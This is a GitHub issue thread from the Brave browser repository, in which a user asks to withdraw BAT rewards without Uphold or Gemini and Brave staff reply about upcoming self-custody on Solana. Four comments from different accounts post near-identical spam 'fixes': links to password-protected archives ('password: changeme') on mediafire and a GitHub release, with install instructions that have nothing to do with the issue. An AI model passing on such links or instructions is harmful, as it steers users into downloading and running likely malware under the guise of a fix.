### ISSUE TITLE
Withdraw BAT without using Uphold or Gemini

### ISSUE THREAD

**Issue by Mild-Solvent** [brave/brave-browser#40630]
### Platforms

all

### Description

Please make it possible to withdraw BAT without using Uphold or Gemini.

I will appreciate so much if I was able to get my BAT to any address on any chain. SOL ETH BTC or anything I will happily pay for fees so you guys can earn but just not to use Uphold where ID card is required... sorry but i love Brave as a privacy browser and ID cards do not match with that.

Thank you <3

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by louseee** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by bsclifton** [comment]
Self custody is on the way - @Miyayes do you have a link to the main issue here on GitHub? We can close this as a duplicate

**Comment by Miyayes** [comment]
@Mild-Solvent Take a look at this announcement: https://brave.com/blog/rewards-solana/ 

We are sending out another round of invites very very soon.  

In the meantime, you can also send me your Rewards Payment ID (which you can find in brave://rewards-internals) and I'll see if we can get you an invite.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
